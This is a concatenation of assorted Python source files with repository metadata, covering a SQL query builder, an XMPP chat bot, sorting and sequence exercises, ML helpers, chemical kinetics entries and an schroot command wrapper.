sets = sets.strip().rstrip(",")
values = values.strip().rstrip(",")
sql = sql + " (%s)" % sets
sql = sql + " VALUES (%s)" % values
return sql
def prepend(self, name, value):
self.__protected[do_dict[name]] = "%s AND %s" % (value, self.__protected[do_dict[name]])
return self
def table(self, table_name):
self.__do("table", table_name)
return self
def where(self, condition):
self.__do("where", condition)
return self
def limit(self, start, end=None):
limit = start if not end else "%s, %s" % (start, end)
self.__do("limit", limit)
return self
def order(self, type):
self.__do("order", type)
return self
def field(self, field):
self.__do("field", field)
return self
def data(self, data):
self.__do("data", data)
return self
def group(self, type):
self.__do("group", type)
return self
def having(self, condition):
self.__do("having", condition)
return self
def join(self, condition):
self.__do("join", condition)
return self
def query(self, sql):
self.__close()
sql = self.__sqlfix(sql)
return self.db.query(sql)
def grasp(self, sql):
select_regx = re.compile(
"SELECT (COUNT\()?(?P<field>[\w\*\s\.,]+)\)? FROM (?P<table_name>.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)",
re.I)
where_complex_regx = re.compile("WHERE (?P<condition>.*?)(LIMIT|ORDER|GROUP|HAVING|LEFT|RIGHT|INNER)", re.I)
where_regx = re.compile("WHERE (?P<condition>.*)", re.I)
limit_regx = re.compile("LIMIT (?P<start>\d+),?\s*(?P<end>\d+)?", re.I)
group_regx = re.compile("GROUP BY (?P<group_by>[\w\.]+)", re.I)
having_regx = re.compile("HAVING (?P<having>\w+)", re.I)
order_regx = re.compile(
"ORDER BY (?P<order_by>[\w\.\,\s]+\s+(ASC|DESC|\(\)|\s))\s*(LIMIT|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)",
re.I)
insert_regx = re.compile(
"INSERT INTO (?P<table_name>\w+) \(((\w+,?\s?)+)\) VALUES \((([\"']?\w+[\"']?,?\s?)+)\)", re.I)
update_complex_regx = re.compile(
"UPDATE (?P<table_name>\w+) SET (.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER)", re.I)
update_regx = re.compile("UPDATE (?P<table_name>\w+) SET (.*)", re.I)
table_regx = re.compile("FROM (?P<table_name>.*?)(LIMIT|ORDER|GROUP|HAVING|WHERE|LEFT|RIGHT|INNER|$)", re.I)
join_regx = re.compile(
"(?P<join_condition>(?P<join_dir>LEFT|RIGHT)?\s*(?P<join_type>INNER|OUTER)? JOIN (?P<table_name>\w+) (AS \w+\s+)?ON (.*?))(LIMIT|ORDER|GROUP|HAVING|WHERE)",
re.I)
select = select_regx.search(sql)
where_complex = where_complex_regx.search(sql)
where = where_regx.search(sql)
limit = limit_regx.search(sql)
group = group_regx.search(sql)
having = having_regx.search(sql)
order = order_regx.search(sql)
insert = insert_regx.search(sql)
update_complex = update_complex_regx.search(sql)
update = update_regx.search(sql)
table = table_regx.search(sql)
join = join_regx.search(sql)
if select:
_field = select.groupdict()["field"]
_table_name = select.groupdict()["table_name"]
self.__do("field", _field)
self.__do("table", _table_name)
if where_complex:
_condition = where_complex.groupdict()["condition"]
self.__do("where", _condition)
elif where:
_condition = where.groupdict()["condition"]
self.__do("where", _condition)
if limit:
start = limit.groupdict()["start"]
end = limit.groupdict()["end"]
_limit = start if not end else "%s, %s" % (start, end)
self.__do("limit", _limit)
if group:
_group_by = group.groupdict()["group_by"]
self.__do("group", _group_by)
if having:
_having = group.groupdict()["having"]
self.__do("having", _having)
if order:
_order_by = order.groupdict()["order_by"]
self.__do("order", _order_by)
if table:
_table_name = table.groupdict()["table_name"]
self.__do("table", _table_name)
if join:
_join = join.groupdict()["join_condition"]
self.__do("join", _join)
if insert:
_table_name = insert.groupdict()["table_name"]
fields = insert.groups()[1].split(",")
values = insert.groups()[3].split(",")
_data = {}
for index, field in enumerate(fields):
field = field.strip()
value = values[index].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
if update_complex:
_table_name = update_complex.groupdict()["table_name"]
pairs = update_complex.groups()[1].split(",")
_data = {}
for index, pair in enumerate(pairs):
pair = pair.split("=")
field = pair[0].strip()
value = pair[1].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
elif update:
_table_name = update.groupdict()["table_name"]
pairs = update.groups()[1].split(",")
_data = {}
for index, pair in enumerate(pairs):
pair = pair.split("=")
field = pair[0].strip()
value = pair[1].strip()
_data[field] = value
self.__do("data", _data)
self.__do("table", _table_name)
return self
def count(self, cheat=False):
sql = "SELECT COUNT(*) FROM %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["join", "where", "group", "having"])
sql = self.__sqlfix(sql)
self.__close()
group_having_regx = re.compile("(GROUP|HAVING)", re.I)
if (not group_having_regx.search(sql)):
return self.db.get(sql)["COUNT(*)"] if not cheat else sql
else:
return len(self.db.query(sql)) if not cheat else sql
def sum(self, field, cheat=False):
sql = "SELECT SUM(%s) FROM %s" % (field, self.__protected["__table_name"])
sql = self.__sqlbuild(sql, ["where"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.get(sql)["SUM(%s)" % field] if not cheat else sql
def find(self, cheat=False):
try:
return self.select()[0] if not cheat else self.select(cheat)
except:
return None
def select(self, cheat=False):
sql = "SELECT %s FROM %s" % (self.__protected["__field"], self.__protected["__table_name"])
sql = self.__sqlbuild(sql, ["join", "where", "group", "having", "order", "limit"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.query(sql) if not cheat else sql
def delete(self, cheat=False):
sql = "DELETE FROM %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["where", "order", "limit"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def save(self, cheat=False):
sql = "UPDATE %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["data:save", "where"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def add(self, cheat=False):
sql = "INSERT INTO %s" % self.__protected["__table_name"]
sql = self.__sqlbuild(sql, ["data:add"])
sql = self.__sqlfix(sql)
self.__close()
return self.db.execute(sql) if not cheat else sql
def pages(self, current_page=1, list_rows=40, cheat=False):
sql = self.select(cheat=True)
self.__close()
count = self.grasp(sql).count()
pages = count / list_rows
pages = pages + 1 if not count % list_rows == 0 else pages
if (pages == 0): pages = 1
if (current_page < 1): current_page = 1
if (current_page > pages): current_page = pages
start = (current_page - 1) * list_rows
end = list_rows
previous_page = current_page - 1 if current_page > 1 else 1
next_page = current_page + 1 if current_page < pages else pages
result = {}
result["list"] = self.grasp(sql).limit(start, end).select()
result["page"] = {
"prev": previous_page,
"next": next_page,
"current": current_page,
"pages": pages,
"total": count,
}
return result if not cheat else self.grasp(sql).limit(start, end).select(cheat)
|
[
"peichao.xu@seetatech.com"
] |
peichao.xu@seetatech.com
|
7ab97c7b41a6cf374e72538106bf02896e8c7fa6
|
21b29ffd891806f03f7821b865fdad9c2a00e729
|
/tom_functions/get_idxs.py
|
9faed6eb0bd02441da9ccc684a3c088b614f6070
|
[] |
no_license
|
mv-lab/kuzushiji-recognition
|
71d46c059d07726d401a364e84900ceb0ebd4d5a
|
08caaeaf40a00e1264b27e0f2157515b8ba8bc95
|
refs/heads/master
| 2020-08-14T10:35:23.277583
| 2019-10-26T08:52:26
| 2019-10-26T08:52:26
| 215,151,222
| 20
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from sklearn.model_selection import KFold
import numpy as np
def get_idxs(data_names):
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
val_idxs_list = []
for fold, (trn,val) in enumerate(kfold.split(data_names, data_names)):
val_idxs_list.append(val)
return val_idxs_list
|
[
"takeskao76@gmail.com"
] |
takeskao76@gmail.com
|
3bfb3cdac592a51897a817cd39f81cefc47b2ee2
|
c7aa115d30f0ef1369351158ae9a8ab97dc121ae
|
/contrib/seeds/makeseeds.py
|
9a54af5449de3623369a6c49b70f7b9695394d22
|
[
"MIT"
] |
permissive
|
DrakeDragon/DRKE
|
16a1edf7b82e473667c09a01636b80aa52ee251f
|
dc982078c40d522d56923fcd66eccbf53d3cfda0
|
refs/heads/master
| 2021-01-20T10:37:35.194951
| 2014-05-01T16:30:19
| 2014-05-01T16:30:19
| 19,335,687
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 708
|
py
|
#!/usr/bin/env python
#
# Generate pnSeed[] from Pieter's DNS seeder
#
NSEEDS=600
import re
import sys
from subprocess import check_output
def main():
lines = sys.stdin.readlines()
ips = []
pattern = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}):9653")
for line in lines:
m = pattern.match(line)
if m is None:
continue
ip = 0
for i in range(0,4):
ip = ip + (int(m.group(i+1)) << (8*(i)))
if ip == 0:
continue
ips.append(ip)
for row in range(0, min(NSEEDS,len(ips)), 8):
print " " + ", ".join([ "0x%08x"%i for i in ips[row:row+8] ]) + ","
if __name__ == '__main__':
main()
|
[
"ixk1@ixk1-nix.(none)"
] |
ixk1@ixk1-nix.(none)
|
f60b73c97d97ca29f0166c2bc0a772c8a6a2ceb8
|
2215c442aa4b716acadfdbab5dd4fb453aad0678
|
/example_random.py
|
d7f042f78d118c5c2747b56c448231802b98bb53
|
[] |
no_license
|
MagnusFelinto/rl-tournament-starter
|
432169be6b6808555d070f39f820f59b1cb2285c
|
c8a5dae929bdd595d5a0bfd049e6a400c4ef5f3f
|
refs/heads/main
| 2023-08-28T20:00:24.932017
| 2021-10-23T18:12:39
| 2021-10-23T18:12:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 745
|
py
|
import soccer_twos
env = soccer_twos.make(render=True, flatten_branched=True)
print("Observation Space: ", env.observation_space.shape)
print("Action Space: ", env.action_space)
team0_reward = 0
team1_reward = 0
env.reset()
while True:
obs, reward, done, info = env.step(
{
0: env.action_space.sample(),
1: env.action_space.sample(),
2: env.action_space.sample(),
3: env.action_space.sample(),
}
)
team0_reward += reward[0] + reward[1]
team1_reward += reward[2] + reward[3]
if max(done.values()): # if any agent is done
print("Total Reward: ", team0_reward, " x ", team1_reward)
team0_reward = 0
team1_reward = 0
env.reset()
|
[
"bryanufg@gmail.com"
] |
bryanufg@gmail.com
|
975e8622daa592d1a122d28698b2e9f19c3f91ba
|
882e9949b0da33b11a5f24156058465da2f95519
|
/input/kinetics/libraries/Aromatics_high_pressure/C9H9_2/reactions.py
|
4b90c6feda3d07d987ead4981efaddc58f03bc15
|
[] |
no_license
|
ReactionMechanismGenerator/RMG-database
|
f4de3a8628951ad7ef154e82b012bfd334d6bc5a
|
b7ff16364a07c9a51a34303aa28407a83455a3e4
|
refs/heads/main
| 2023-09-04T06:18:30.835821
| 2023-08-08T13:37:08
| 2023-08-08T13:37:08
| 1,838,004
| 69
| 94
| null | 2023-09-08T16:39:04
| 2011-06-02T16:09:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,789
|
py
|
#!/usr/bin/env python
# encoding: utf-8
name = "Aromatics_high_pressure/C9H9_2"
shortDesc = u"Benzyl radical+Acetylene and Benzene+Propargyl radical"
longDesc = u"""
Ab Initio G3-type/Statistical Theory Study of the Formation of Indene in Combustion Flames. I. Pathways Involving Benzene and Phenyl Radical
V. V. Kislov and A. M. Mebel
J. Phys. Chem. A 2007, 111, 3922-3931
level of theory:G3(MP2,CC)//B3LYP/6-311G**, TST rates reported in literature and fitted in RMG
"""
entry(
index = 7,
label = "C7H7_10 + ethyne_8 <=> C9H9_13",
degeneracy = 1,
kinetics = Arrhenius(
A = (31630, 'cm^3/(mol*s)'),
n = 2.479,
Ea = (11.061, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 8,
label = "C9H9_13 <=> C9H9_14",
degeneracy = 1,
kinetics = Arrhenius(A=(1.257e+11, 's^-1'), n=0.139, Ea=(13.233, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 9,
label = "C9H9_14 <=> indene_25 + H_15",
degeneracy = 1,
kinetics = Arrhenius(A=(3.597e+10, 's^-1'), n=0.889, Ea=(20.893, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 10,
label = "benzene_1 + C3H3_9 <=> C9H9_2",
degeneracy = 1,
kinetics = Arrhenius(
A = (144.6, 'cm^3/(mol*s)'),
n = 2.951,
Ea = (14.055, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 11,
label = "benzene_1 + C3H3_9 <=> C9H9_6",
degeneracy = 1,
kinetics = Arrhenius(
A = (312.3, 'cm^3/(mol*s)'),
n = 2.973,
Ea = (16.396, 'kcal/mol'),
T0 = (1, 'K'),
),
)
entry(
index = 12,
label = "C9H9_2 <=> C9H9_3",
degeneracy = 1,
kinetics = Arrhenius(A=(6.485e+11, 's^-1'), n=0.065, Ea=(27.941, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 13,
label = "C9H9_6 <=> C9H9_3",
degeneracy = 1,
kinetics = Arrhenius(A=(5.565e+11, 's^-1'), n=0.009, Ea=(28.521, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 14,
label = "C9H9_3 <=> C9H9_24",
degeneracy = 1,
kinetics = Arrhenius(A=(9.527e+10, 's^-1'), n=0.853, Ea=(47.848, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 15,
label = "C9H9_24 <=> C9H9_14",
degeneracy = 1,
kinetics = Arrhenius(A=(4.438e+10, 's^-1'), n=0.625, Ea=(38.324, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 16,
label = "C9H9_3 <=> C9H9_4",
degeneracy = 1,
kinetics = Arrhenius(A=(1.231e+11, 's^-1'), n=0.765, Ea=(55.941, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 17,
label = "C9H9_4 <=> C9H9_5",
degeneracy = 1,
kinetics = Arrhenius(A=(3.677e+10, 's^-1'), n=0.839, Ea=(43.638, 'kcal/mol'), T0=(1, 'K')),
)
entry(
index = 18,
label = "C9H9_5 <=> indene_25 + H_15",
degeneracy = 1,
kinetics = Arrhenius(A=(4.591e+10, 's^-1'), n=0.886, Ea=(24.975, 'kcal/mol'), T0=(1, 'K')),
)
|
[
"ampayne@mit.edu"
] |
ampayne@mit.edu
|
276522ebb23738f05417dc7191682cab9bdbed1e
|
41df021a3082b9b462ab11f917a06c1d87c3857d
|
/src/csv_reader/channel_reader.py
|
bba130dd9170db8dda3dfcdb7c119a139b3e074d
|
[] |
no_license
|
rodrigolazarinigil/mysql_etl
|
f6b0224d87a4c50ec7c82abbb69280fa0dfc360f
|
1e2b01b846e4e5467ab92229a06474697c85450a
|
refs/heads/master
| 2021-06-19T00:26:31.655018
| 2017-06-18T23:08:58
| 2017-06-18T23:08:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
"""Leitor de arquivos (ver datafile_name abaixo)."""
import abc
from csv_reader.base_reader import BaseReader
class ChannelReader(BaseReader):
"""Leitor de arquivos."""
def __init__(self):
"""Construtor."""
self.datafile_name = 'channel.csv'
self.column_names = [
'id', 'name', 'account_id'
]
super().__init__()
@abc.abstractmethod
def transform(self):
"""Transformar o data frame."""
self.df.drop_duplicates(subset='id', keep='first', inplace=True)
|
[
"rodrigo.lazarini.gil@gmail.com"
] |
rodrigo.lazarini.gil@gmail.com
|
ebc69e51ec69ea040c5c48d1b773443bed191682
|
b560f533f66af8787039e663795a77173a43d3c1
|
/Algorighms/Sort/BubbleSort.py
|
f3a8e452c5648ed350f28fcfe5c5470e234ac148
|
[
"Apache-2.0"
] |
permissive
|
z-waterking/ClassicAlgorighthms
|
37ac0c22ef53216c87530a6f5134049f86e0a35d
|
b769d46727279cf6d8532819076a3fef496d05c7
|
refs/heads/main
| 2023-04-25T16:44:20.402419
| 2021-05-24T07:15:36
| 2021-05-24T07:15:36
| 310,014,865
| 27
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,180
|
py
|
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : BubbleSort.py
@USER : ZZZZZ
@TIME : 2021/4/21 16:41
'''
class BubbleSort():
def __init__(self):
self.exchange_count = 0
def Solution(self, nums):
'''
对数组元素进行冒泡排序, 从小到大进行排序
:param nums: 数字列表
:return: list, 从小到大排好序的数组
'''
# 一共比较 len(nums) - 1 趟即可
for i in range(len(nums) - 1):
# 此处每一轮都可以使得最后一个元素就位,因此需要 -i , 不用进行后序的比较了
for j in range(len(nums) - 1 - i):
if nums[j] > nums[j + 1]:
nums[j], nums[j + 1] = nums[j + 1], nums[j]
# 记录一次交换
self.exchange_count += 1
return nums
def GetExchangeCount(self):
return self.exchange_count
if __name__ == "__main__":
nums = [4, 5, 2, 9, 1]
st = BubbleSort()
print("冒泡排序结果为: {}".format(st.Solution(nums)))
print("交换次数为: {}".format(st.GetExchangeCount()))
|
[
"sifan.zsf@alibaba-inc.com"
] |
sifan.zsf@alibaba-inc.com
|
5b33a727698a9e689e58578cd4c124c751a1c2ff
|
213b8cab639c7d45cbf6a4fd46eb23e379d9d374
|
/python/xmpp/sleekxmpp/muc.py
|
809714ac8204f86f33172b1419455cd7e639b5b0
|
[] |
no_license
|
DevDungeon/Cookbook
|
f85b04b690ea0a202ddfaeda6460b6ba5797cb70
|
a49a1c77f2b89dc303fa9f2563bb3c19777e4c6c
|
refs/heads/master
| 2023-05-12T06:58:50.606019
| 2022-03-30T04:48:16
| 2022-03-30T04:48:16
| 34,371,982
| 307
| 94
| null | 2023-05-03T22:53:45
| 2015-04-22T06:02:53
|
HTML
|
UTF-8
|
Python
| false
| false
| 7,413
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class MUCBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot that will greets those
who enter the room, and acknowledge any messages
that mentions the bot's nickname.
"""
def __init__(self, jid, password, room, nick):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.room = room
self.nick = nick
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
# listen for this event so that we we can initialize
# our roster.
self.add_event_handler("session_start", self.start)
# The groupchat_message event is triggered whenever a message
# stanza is received from any chat room. If you also also
# register a handler for the 'message' event, MUC messages
# will be processed by both handlers.
self.add_event_handler("groupchat_message", self.muc_message)
# The groupchat_presence event is triggered whenever a
# presence stanza is received from any chat room, including
# any presences you send yourself. To limit event handling
# to a single room, use the events muc::room@server::presence,
# muc::room@server::got_online, or muc::room@server::got_offline.
self.add_event_handler("muc::%s::got_online" % self.room,
self.muc_online)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.get_roster()
self.send_presence()
self.plugin['xep_0045'].joinMUC(self.room,
self.nick,
# If a room password is needed, use:
# password=the_room_password,
wait=True)
def muc_message(self, msg):
"""
Process incoming message stanzas from any chat room. Be aware
that if you also have any handlers for the 'message' event,
message stanzas may be processed by both handlers, so check
the 'type' attribute when using a 'message' event handler.
Whenever the bot's nickname is mentioned, respond to
the message.
IMPORTANT: Always check that a message is not from yourself,
otherwise you will create an infinite loop responding
to your own messages.
This handler will reply to messages that mention
the bot's nickname.
Arguments:
msg -- The received message stanza. See the documentation
for stanza objects and the Message stanza to see
how it may be used.
"""
if msg['mucnick'] != self.nick and self.nick in msg['body']:
self.send_message(mto=msg['from'].bare,
mbody="I heard that, %s." % msg['mucnick'],
mtype='groupchat')
def muc_online(self, presence):
"""
Process a presence stanza from a chat room. In this case,
presences from users that have just come online are
handled by sending a welcome message that includes
the user's nickname and role in the room.
Arguments:
presence -- The received presence stanza. See the
documentation for the Presence stanza
to see how else it may be used.
"""
if presence['muc']['nick'] != self.nick:
self.send_message(mto=presence['from'].bare,
mbody="Hello, %s %s" % (presence['muc']['role'],
presence['muc']['nick']),
mtype='groupchat')
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
optp.add_option("-r", "--room", dest="room",
help="MUC room to join")
optp.add_option("-n", "--nick", dest="nick",
help="MUC nickname")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.room is None:
opts.room = raw_input("MUC room: ")
if opts.nick is None:
opts.nick = raw_input("MUC nickname: ")
# Setup the MUCBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = MUCBot(opts.jid, opts.password, opts.room, opts.nick)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0045') # Multi-User Chat
xmpp.register_plugin('xep_0199') # XMPP Ping
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
|
[
"nanodano@devdungeon.com"
] |
nanodano@devdungeon.com
|
07240436b94896e4cd203d2c80217d9e6e354946
|
f0fa96d39a66c3ddaae4266442a13ec3feb7a462
|
/golomb_sequence.py
|
e24d0e8b18815a77114f0005b52c26dab5e85938
|
[] |
no_license
|
ashishgupta2014/problem_solving_practices
|
14d587e98d9996a95efe822335ca4baccb39b1a1
|
bc4f4b07e1e33273010e34428e0c31d2d6656c14
|
refs/heads/master
| 2023-04-26T03:47:40.766508
| 2021-06-07T04:55:52
| 2021-06-07T04:55:52
| 298,063,915
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 917
|
py
|
def golomb_sequence(n, arr):
"""
https://www.geeksforgeeks.org/golomb-sequence/
In mathematics, the Golomb sequence is a non-decreasing integer sequence where n-th term is equal to number of
times n appears in the sequence.
The first few values are
1, 2, 2, 3, 3, 4, 4, 4, 5, 5, 5, ……
Explanation of few terms:
Third term is 2, note that three appears 2 times.
Second term is 2, note that two appears 2 times.
Fourth term is 3, note that four appears 3 times.
Given a positive integer n. The task is to find the first n terms of Golomb sequence.
:param n:
:return:
"""
if n == 1:
return 1
if arr[n] != 0:
return arr[n]
arr[n] = 1 + golomb_sequence(n - golomb_sequence(golomb_sequence(n - 1, arr), arr), arr)
return arr[n]
n = 6
arr = [0] * (n+1)
for i in range(1, n + 1):
print(golomb_sequence(i, arr), end=" ")
|
[
"ashish.2007g@gmail.com"
] |
ashish.2007g@gmail.com
|
f48ebb2d34d6a796df71d3ba1d81367099f02ef8
|
eda7ed06b80be37b1312ec15992c79153cccab60
|
/python/fib.py
|
3b25c42ddbe7256594c129f1af34e4cbaa73a38f
|
[] |
no_license
|
niraj17/work
|
ab01a31ce0692d2cdcb66edd288e0d44b0d32deb
|
033cb2e48c5d41a9e97077d51cee8b73410d3a80
|
refs/heads/master
| 2021-03-12T23:07:56.580448
| 2016-12-23T05:26:14
| 2016-12-23T05:26:14
| 7,384,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 326
|
py
|
#!/usr/bin/env python
import sys
def fib(n):
last2 = 0
last = 1
if n == 0 or n == 1:
return n
for i in range(2, n+1):
f = last + last2
last2 = last
last = f
return f
def main():
ans = fib(int(sys.argv[1]))
print "Fib=", ans
if __name__ == '__main__':
main()
|
[
"niraj17@gmail.com"
] |
niraj17@gmail.com
|
6f1bc0864ae57891b44f10a086a77cb09a0b781d
|
fb3b50051e4fd919ab4de94312da32faf33c7d21
|
/research/self_driving_car/car/neural_network.py
|
bbe4aecd5cd1e22d722ec000770b592cd21ebe23
|
[
"MIT"
] |
permissive
|
hoangtnm/deep-learning
|
95310078120657c27e90c58f73981863e52db06d
|
bbc2c1adb38bfd7c066a4fe6b5a0e0dab6df21cb
|
refs/heads/master
| 2021-06-24T04:48:23.113663
| 2020-05-20T08:40:20
| 2020-05-20T08:40:20
| 139,654,631
| 2
| 2
|
MIT
| 2020-05-20T08:40:21
| 2018-07-04T01:43:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
import torch.nn as nn
from torchvision import models
import torch.nn.functional as F
model_ft = models.resnet18(pretrained=True)
num_ftrs = model_ft.fc.in_features
model_ft.fc = nn.Linear(num_ftrs, 1)
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# convolutional layer (sees 224x224x3 image tensor)
self.conv1 = nn.Conv2d(3, 24, 5, stride=2, padding=1)
self.conv2 = nn.Conv2d(24, 32, 5, stride=1, padding=1)
self.conv3 = nn.Conv2d(32, 64, 5, stride=1, padding=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.conv5 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.pool = nn.MaxPool2d(2, 2)
self.flatten = Flatten()
self.fc1 = nn.Linear(64*3*3, 144)
self.fc2 = nn.Linear(144, 1)
self.dropout = nn.Dropout(0.15)
def forward(self, x):
# add sequence of convolutional and max pooling layers
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = self.pool(F.relu(self.conv4(x)))
x = self.pool(F.relu(self.conv5(x)))
# flatten image input
x = self.flatten(x)
x = self.dropout(x)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2(x)
return x
|
[
"minhhoangtrannhat@gmail.com"
] |
minhhoangtrannhat@gmail.com
|
bdaa415fcfcfcd6249e9a52e214476f4597bd832
|
18fd4062e7bdc626df99229eba78affa9b94859b
|
/flaskk/__main__.py
|
b6e7f408dd83fa69ca0b938fe60d9fc3c580ff45
|
[] |
no_license
|
root-sudip/Search-Engine
|
57290708924895a4d26dc5252a0300453b7d7b31
|
e24db9e14e3330b59f140269cbd687ab338e95d6
|
refs/heads/master
| 2021-01-20T05:52:41.168438
| 2017-05-11T11:29:38
| 2017-05-11T11:29:38
| 89,817,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
# -*- coding: utf-8 -*-
"""
flask.__main__
~~~~~~~~~~~~~~
:copyright: (c) 2015 by Sudip Das.
"""
if __name__ == '__main__':
from .cli import main
main(as_module=True)
|
[
"touch.das@gmail.com"
] |
touch.das@gmail.com
|
f960790283fc72eb28d0c683a04afb7ba9eeb3b1
|
bce28b80ec97dc859da1457f7d20c8d627d57318
|
/executor/schroot.py
|
b3a406c32efd7825e3940a23ed032d70304c466e
|
[
"MIT"
] |
permissive
|
lukehuang/python-executor
|
d791a37a65cde71fc9323830aae13564345475a0
|
9ab0ee8ac76abcbbb5ad6cbe74ab704d0e1f7f5d
|
refs/heads/master
| 2020-12-30T15:53:58.732451
| 2017-04-13T21:38:27
| 2017-04-13T21:38:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,118
|
py
|
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: April 13, 2017
# URL: https://executor.readthedocs.io
"""
Secure command execution in chroot environments.
The :mod:`executor.schroot` module defines the :class:`ChangeRootCommand` class
which makes it easy to run commands inside chroots_ that are managed using the
schroot_ program.
.. _chroots: http://en.wikipedia.org/wiki/Chroot
.. _schroot: https://wiki.debian.org/Schroot
"""
# Standard library modules.
import logging
# External dependencies.
from property_manager import mutable_property, required_property
# Modules included in our package.
from executor import DEFAULT_WORKING_DIRECTORY, ExternalCommand
# Initialize a logger.
logger = logging.getLogger(__name__)
SCHROOT_PROGRAM_NAME = 'schroot'
"""The name of the ``schroot`` program (a string)."""
DEFAULT_NAMESPACE = 'chroot'
"""
The default chroot namespace (a string).
Refer to the schroot_ documentation for more information about chroot
namespaces.
"""
class ChangeRootCommand(ExternalCommand):
""":class:`ChangeRootCommand` objects use the schroot_ program to execute commands inside chroots."""
def __init__(self, *args, **options):
"""
Initialize a :class:`ChangeRootCommand` object.
:param args: Positional arguments are passed on to the initializer of
the :class:`.ExternalCommand` class.
:param options: Any keyword arguments are passed on to the initializer
of the :class:`.ExternalCommand` class.
If the keyword argument `chroot_name` isn't given but positional
arguments are provided, the first positional argument is used to set
the :attr:`chroot_name` property.
The command is not started until you call
:func:`~executor.ExternalCommand.start()` or
:func:`~executor.ExternalCommand.wait()`.
"""
# Enable modification of the positional arguments.
args = list(args)
# We allow `chroot_name' to be passed as a keyword argument but use the
# first positional argument when the keyword argument isn't given.
if options.get('chroot_name') is None and args:
options['chroot_name'] = args.pop(0)
# Inject our logger as a default.
options.setdefault('logger', logger)
# Initialize the superclass.
super(ChangeRootCommand, self).__init__(*args, **options)
@mutable_property
def chroot_directory(self):
"""
The working directory _inside the chroot_ (a string or :data:`None`, defaults to ``/``).
